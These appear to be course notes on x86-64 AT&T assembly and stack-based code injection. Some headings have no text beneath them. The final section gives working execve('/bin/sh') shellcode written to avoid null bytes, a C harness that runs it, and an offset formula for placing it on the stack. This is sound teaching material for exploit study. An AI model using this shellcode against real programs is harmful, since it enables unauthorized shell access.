We use x86 assembly in AT&T notation (personal note: Intel notation is nicer to use, though).
- # starts a comment (Intel uses ;)

Low-level, processor-specific symbolic language, directly translated to machine code.

Instructions: simple operations like mov %rax, %rbx (copies the value from register rax to register rbx)
- Form: mnemonic source, destination (the mnemonic is a short code telling the CPU what to do)
- Registers are prefixed with %, e.g. %rax, %rsp, or %al
  - General purpose: %rax, %rbx, %rcx, %rdx, %rsi, %rdi, %r8-%r15
  - Stack pointer: %rsp
  - Frame (base) pointer: %rbp
  - Instruction pointer: %rip
  - Segment registers: %cs, %ds, %es, %fs, etc.
  - Sub-registers of %rax: %eax (32-bit), %ax (16-bit), %ah (high 8 bits of %ax), %al (low 8 bits of %ax)
- Memory operands, e.g. 0x401000, 8(%rbp), (%rdx, %rcx, 4)
  - General form: offset(base, index, scale)
  - Address: offset + base + index*scale
  - base, index: 64-bit registers
    - base can be %rip; a symbolic displacement is then relative to the next instruction
  - offset: 32-bit constant or symbol, default 0
  - scale: 1, 2, 4, or 8 (default 1)
- Immediates are prefixed with $ (e.g. $42)

Directives: commands for the assembler
- .data: section with variables
- .text: section with code
- .byte/.word/.long/.quad: integer (8/16/32/64 bits)
- .ascii/.asciz: outputs a string (without/with null terminator)
- labels: create a symbol at the current address (foo: .byte 42 is similar to a global char foo = 42)
- comments: prefixed with #
Endianness: when storing an integer in memory, which byte is stored first
Signed integers:
Common instructions:
| example | meaning |
|---|---|
| mov src, dst | dst = src |
| xchg dst1, dst2 | swap dst1 and dst2 |
| push src | store src on top of stack |
| pop dst | remove value from top of stack and store in dst |
| add src, dst | dst += src |
| sub src, dst | dst -= src |
| inc dst | dst += 1 |
| dec dst | dst -= 1 |
| neg dst | dst = -dst |
| cmp src1, src2 | set flags based on src2-src1 |
| and src, dst | dst &= src |
| or src, dst | dst |= src |
| xor src, dst | dst ^= src |
| not dst | dst = ~dst |
| test src1, src2 | set flags based on src1 & src2 |
| jmp addr | jump to addr |
| call addr | push return address, call function addr |
| ret | pop return address, return there |
| syscall | enter kernel to perform system call (based on registers) |
| lea src, dst | dst = &src (src must be in memory) |
| nop | do nothing |
Conditional branching instructions (prepend ‘n’ to condition for opposite, e.g. jne)
| example | meaning |
|---|---|
| je addr; jz addr | jump if result == 0 |
| jb addr | jump if dst < src (unsigned) |
| ja addr | jump if dst > src (unsigned) |
| jl addr | jump if dst < src (signed) |
| jg addr | jump if dst > src (signed) |
| js addr | jump if result < 0 (signed) |
Stack:
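- %rsp is the stack pointer
- The top of the stack is at the address in %rsp
- The stack grows toward lower addresses (push decrements %rsp by 8, pop increments %rsp by 8)
- Function calls: the first six arguments go in registers (%rdi, %rsi, %rdx, %rcx, %r8, %r9), other parameters on the stack right-to-left (but note: this depends on the calling convention)
- Function prologue:
  - push %rbp
  - set %rbp to %rsp
  - save the callee-saved registers the function uses (e.g. %r12-%r15)
  - decrement %rsp to make space for local vars
- The return value goes in %rax
- Function epilogue:
  - set %rsp to %rbp
  - pop %rbp

Assume we: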
Where do we point return address?
x86 CPUs don’t distinguish code and data, so if memory permissions allow:
How do we inject code into program?
Injected code must:
User code can’t start program, kernel does that. So tell kernel to do something using a syscall:
Starting a shell:
- Goal: execve("/bin/sh", argv, NULL), where char *argv[] = { "/bin/sh", NULL }
- %rax register stores which system call to invoke, 0x3b is execve
- syscall: switch to kernel, result is stored in %rax after return
- retq: return to caller
- Arguments: %rdi (program name), %rsi (argv), %rdx (envp)

Shellcode:
.data
.globl shellcode
shellcode:
jmp code_start
string_addr:
.ascii "/bin/shNAAAAAAAABBBBBBBB"
code_start:
leaq string_addr(%rip), %rdi # load the address of the string into %rdi ('path' in execve), offset is negative to avoid null bytes
xorl %eax, %eax # clear %rax without using null bytes
movb %al, 0x07(%rdi) # replace "N" in string with null, use %rax to avoid explicit null
movq %rdi, 0x08(%rdi) # move program name to argv[0] in execve
movq %rax, 0x10(%rdi) # move null to argv[1] in execve, use %rax to avoid explicit null
leaq 0x08(%rdi), %rsi # load address of argv into %rsi
movq %rax, %rdx # load null into %rdx ('envp' in execve), use %rax to avoid explicit null
movb $0x3b, %al # load syscall number into %rax, 0x3b is execve, we already xored %rax so other bytes are zero
syscall # perform call 0x3b(%rdi, %rsi, %rdx)
.byte 0
Testing shellcode:
#include <stdio.h>
int main(int argc, char **argv) {
extern char shellcode;
void (*f)(void) = (void (*)(void)) &shellcode; // cast pointer to shellcode to function pointer to 'void shellcode(void)'
f();
fprintf(stderr, "this shouldn't print\n");
return -1;
}
Injecting the shellcode:
bottom_of_stack - 8 - (strlen(progname) + 1) - (strlen(shellcode) + 1)